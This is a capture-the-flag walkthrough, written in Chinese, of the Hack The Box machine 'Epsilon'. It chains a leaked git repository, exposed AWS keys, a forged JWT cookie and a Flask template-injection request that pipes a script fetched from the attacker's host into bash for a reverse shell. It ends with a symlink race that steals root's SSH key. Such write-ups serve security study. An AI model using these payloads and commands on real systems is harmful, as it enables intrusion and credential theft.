Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.11.134 | TCP:22,80,5000 |
$ ip='10.10.11.134'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.41 (Ubuntu)
5000/tcp open http Werkzeug httpd 2.0.2 (Python 3.8.10)
|_http-server-header: Werkzeug/2.0.2 Python/3.8.10
|_http-title: Costume Shop
Git leak && AWS AKSK && AWS Lambda cli && Function Information Leakage && JWT secret leak
$ dirb http://10.10.11.134
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图](https://img.4awl.net/img/f8/f2d2546ef94d09c841350a734aab37.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图")
$ git-dumper http://10.10.11.134/.git/ /tmp/res
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图1](https://img.4awl.net/img/c0/49a9d4443ee393c1a9e91bddfa3dd2.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图1")
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图2](https://img.4awl.net/img/88/9783b7221052f2181eae3857764ea1.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图2")
# echo '10.10.11.134 epsilon.htb cloud.epsilon.htb'>>/etc/hosts
# server.py
#!/usr/bin/python3
import jwt
from flask import *
app = Flask(__name__)
secret = '<secret_key>'
def verify_jwt(token,key):
try:
username=jwt.decode(token,key,algorithms=['HS256',])['username']
if username:
return True
else:
return False
except:
return False
@app.route("/", methods=["GET","POST"])
def index():
if request.method=="POST":
if request.form['username']=="admin" and request.form['password']=="admin":
res = make_response()
username=request.form['username']
token=jwt.encode({"username":"admin"},secret,algorithm="HS256")
res.set_cookie("auth",token)
res.headers['location']='/home'
return res,302
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route("/home")
def home():
if verify_jwt(request.cookies.get('auth'),secret):
return render_template('home.html')
else:
return redirect('/',code=302)
@app.route("/track",methods=["GET","POST"])
def track():
if request.method=="POST":
if verify_jwt(request.cookies.get('auth'),secret):
return render_template('track.html',message=True)
else:
return redirect('/',code=302)
else:
return render_template('track.html')
@app.route('/order',methods=["GET","POST"])
def order():
if verify_jwt(request.cookies.get('auth'),secret):
if request.method=="POST":
costume=request.form["costume"]
message = '''
Your order of "{}" has been placed successfully.
'''.format(costume)
tmpl=render_template_string(message,costume=costume)
return render_template('order.html',message=tmpl)
else:
return render_template('order.html')
else:
return redirect('/',code=302)
app.run(debug='true')
# track_api_CR_148.py
import io
import os
from zipfile import ZipFile
from boto3.session import Session
session = Session(
aws_access_key_id='<aws_access_key_id>',
aws_secret_access_key='<aws_secret_access_key>',
region_name='us-east-1',
endpoint_url='http://cloud.epsilon.htb')
aws_lambda = session.client('lambda')
def files_to_zip(path):
for root, dirs, files in os.walk(path):
for f in files:
full_path = os.path.join(root, f)
archive_name = full_path[len(path) + len(os.sep):]
yield full_path, archive_name
def make_zip_file_bytes(path):
buf = io.BytesIO()
with ZipFile(buf, 'w') as z:
for full_path, archive_name in files_to_zip(path=path):
z.write(full_path, archive_name)
return buf.getvalue()
def update_lambda(lambda_name, lambda_code_path):
if not os.path.isdir(lambda_code_path):
raise ValueError('Lambda directory does not exist: {0}'.format(lambda_code_path))
aws_lambda.update_function_code(
FunctionName=lambda_name,
ZipFile=make_zip_file_bytes(path=lambda_code_path))
1.AWS key未知
2.server.py在端口5000运行
3.在track_api_CR_148.py中aws_lambda = session.client('lambda')=>使用 AWS SDK for Python(Boto3) 创建一个 AWS Lambda 客户端
AWS Lambda 是 Amazon Web Services(AWS)提供的 无服务器计算服务,允许你运行代码而不需要管理服务器。在 Lambda 中,你只需编写代码,并上传至 Lambda 服务。AWS 会在有事件发生时自动运行代码并按需分配资源。
泄露AWS Key
$ git log -p --all
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图3](https://img.4awl.net/img/6f/7ea0f7489aad7854b4bbe4bf16d2e6.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图3")
aws_access_key_id='AQLA5M37BDN6FJP76TDC',
aws_secret_access_key='OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A',
1.配置AWS
$ aws configure
AWS Access Key ID [None]: AQLA5M37BDN6FJP76TDC
AWS Secret Access Key [None]: OsK0o/glWwcjk2U3vVEowkvq5t4EiIreB+WdFo1A
Default region name [None]: us-east-1
Default output format [None]: json
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图4](https://img.4awl.net/img/bc/972a1259c6a351e2d19a6906f8bcfa.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图4")
2.列出aws lambda服务的函数
$ aws --endpoint-url=http://cloud.epsilon.htb lambda list-functions
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图5](https://img.4awl.net/img/98/050128f73cc90eaa7b654ce1a60994.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图5")
3.查看costume_shop_v1函数
$ aws --endpoint-url=http://cloud.epsilon.htb lambda get-function --function-name=costume_shop_v1
http://cloud.epsilon.htb/2015-03-31/functions/costume_shop_v1/code
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图6](https://img.4awl.net/img/f7/a856ef63dac5f9e750396dff07de25.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图6")
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图7](https://img.4awl.net/img/18/e1eb005edc25ad92ccbbeea872050d.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图7")
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图8](https://img.4awl.net/img/2a/9e3ca17f4773051b6325d140a7ae79.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图8")
RrXCv`mrNe!K!4+5`wYq
$ python3 -c 'import jwt; print("Cookie: auth="+jwt.encode({"username": "admin", "password": "admin"}, "RrXCv`mrNe!K!4+5`wYq", algorithm="HS256"))'
http://epsilon.htb:5000/home
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图9](https://img.4awl.net/img/ff/d38f2ce2920ecddd3431d43d1ad9c3.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图9")
Flask SSTI
$ whatweb http://epsilon.htb:5000/home --cookie='auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA'
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图10](https://img.4awl.net/img/5b/1e3395fe2f5ff7968739f076ea2501.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图10")
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图11](https://img.4awl.net/img/b0/7b961e92ad537b89ec5b5b0b0c767b.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图11")
POST /order HTTP/1.1
Host: epsilon.htb:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://epsilon.htb:5000
Connection: close
Referer: http://epsilon.htb:5000/order
Cookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbiJ9.r6AIIBdhkEV-3LEXG1usQ40lEDpHywesJwRqFc-FgcA
Upgrade-Insecure-Requests: 1
costume={{request.application.__globals__.__builtins__.__import__('os').popen('curl+10.10.16.33/reverse.sh|bash').read()}}&q=fff&addr=dddd
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图12](https://img.4awl.net/img/5b/0a398b2070b89415900bc7beae1072.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图12")
User.txt
e1c8605ea5b043a7fc870cadea41d42a
Privilege Escalation:tar -h && ln hijack
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图13](https://img.4awl.net/img/ce/5baa0d74370cfc509cffd92074a398.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图13")
这个脚本备份了 /var/www/app/ 目录,生成一个 tar 压缩包并计算其 SHA1 校验和,然后将压缩包和校验和一起打包到另一个压缩文件中,最后清空了原始备份文件夹 /opt/backups/。
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图14](https://img.4awl.net/img/28/18a87c060c9080ba938c69f839be66.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图14")
注意:这里即使在/var/www/app/创建ln软链接,也将无法指定root的ssh私钥。由于tar缺少-h参数将会造成这种情况....tar如果使用了 -h 或 --dereference 选项,则tar才会解引用符号链接。
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图15](https://img.4awl.net/img/9c/391b464c249064a4a69ccb1b8cc3d9.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图15")
在/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"中,可以通过劫持/opt/backups/checksum来间接备份root文件
$ ls -la /var/backups/web_backups/; while ! [ -e /opt/backups/checksum ]; do :; done; rm -rf /opt/backups/checksum && ln -sf /root/.ssh/id_rsa /opt/backups/checksum;ls -la /var/backups/web_backups/
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图16](https://img.4awl.net/img/27/7a2212ff52677bef5678cbbad6c782.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图16")
![[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图17](https://img.4awl.net/img/ab/04c21962058f2ca59c1c26e20cee8b.jpg "[Meachines] [Medium] Epsilon Git+AWS-Function+JWT+Flask-SSTI+tar-h(ln hijac…插图17")
Root.txt
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
